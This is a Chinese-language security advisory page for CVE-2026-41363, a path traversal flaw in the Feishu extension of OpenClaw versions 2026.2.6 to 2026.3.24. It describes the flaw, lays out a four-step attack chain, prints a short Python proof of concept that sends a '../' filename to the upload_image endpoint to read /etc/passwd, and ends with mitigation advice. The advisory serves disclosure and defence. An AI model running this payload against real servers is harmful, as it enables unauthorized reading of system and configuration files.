IPBUF安全漏洞报告
English
CVE-2026-41363 CVSS 5.3 中危

CVE-2026-41363 OpenClaw路径遍历漏洞

披露日期: 2026-04-28

漏洞信息

漏洞编号
CVE-2026-41363
漏洞类型
路径遍历
CVSS评分
5.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
OpenClaw

相关标签

路径遍历OpenClaw文件读取CVE-2026-41363Arbitrary File Read

漏洞概述

OpenClaw是一款广泛使用的应用程序。近日披露的安全漏洞存在于OpenClaw 2026.2.6至2026.3.24版本的飞书扩展组件中。具体而言,`resolveUploadInput`函数存在严重的路径遍历缺陷,未能正确验证和处理文件路径。攻击者利用该漏洞可以绕过严格的文件系统沙箱限制,通过精心构造恶意的`upload_image`请求,成功读取服务器上配置的`localRoots`边界之外的任意文件。这一安全缺陷可能导致敏感配置信息或用户数据的泄露。

技术细节

该漏洞源于OpenClaw飞书扩展模块中的`resolveUploadInput`函数在处理文件上传逻辑时存在缺陷。在正常情况下,系统应当限制文件访问仅限于预设的`localRoots`目录内,以防止目录遍历攻击。然而,由于缺乏对用户输入路径的充分净化和规范化处理,攻击者可以通过在文件名参数中插入特殊的路径遍历序列(如`../`),从而突破沙箱限制。

当攻击者发送包含恶意路径的`upload_image`操作请求时,`resolveUploadInput`函数未能正确解析路径,导致构建的最终文件路径指向了预期的根目录之外。因为CVSS向量显示需要低权限(PR:L)且无需交互(UI:N),攻击者只需拥有基本的访问权限即可远程发起攻击。尽管攻击复杂度较高(AC:H),但一旦利用成功,攻击者即可获取服务器上的高机密性信息(C:H),如配置文件、源代码或其他敏感数据,而不会影响系统的完整性和可用性。

攻击链分析

STEP 1
侦察与访问
攻击者获取OpenClaw系统的低权限账户访问权限,并确认目标运行在受影响的版本范围内(2026.2.6 - 2026.3.24)。
STEP 2
构造恶意载荷
攻击者分析`resolveUploadInput`函数的逻辑,构造包含路径遍历字符(如`../`)的文件名参数,旨在访问`localRoots`之外的敏感文件。
STEP 3
发送利用请求
攻击者向服务端的`upload_image`接口发送特制的POST请求,触发存在漏洞的函数,绕过文件系统沙箱检查。
STEP 4
数据读取与泄露
服务器解析恶意路径并返回目标文件(如/etc/passwd或配置文件)的内容,攻击者成功获取敏感信息。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL (Example) target_url = "http://example.com/api/feishu/upload_image" # Malicious payload exploiting path traversal in resolveUploadInput # Attempting to read /etc/passwd outside localRoots payload = { "filename": "../../../../../../etc/passwd" } try: # Send the malicious request response = requests.post(target_url, data=payload) # Check if the exploitation was successful if response.status_code == 200 and "root:" in response.text: print("[+] Exploit successful! Arbitrary file read achieved.") print("[+] File content:") print(response.text) else: print("[-] Exploit failed or target patched.") print("Status Code:", response.status_code) except Exception as e: print(f"[!] An error occurred: {e}")

影响范围

OpenClaw 2026.2.6
OpenClaw 2026.2.7
OpenClaw 2026.3.24
OpenClaw 2026.2.6 - 2026.3.24

防御指南

临时缓解措施
建议立即检查OpenClaw版本并应用官方补丁。在未升级前,可暂时禁用飞书扩展中的图片上传功能,或通过Web应用防火墙(WAF)拦截包含`../`或绝对路径特征的请求参数,以降低被攻击的风险。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表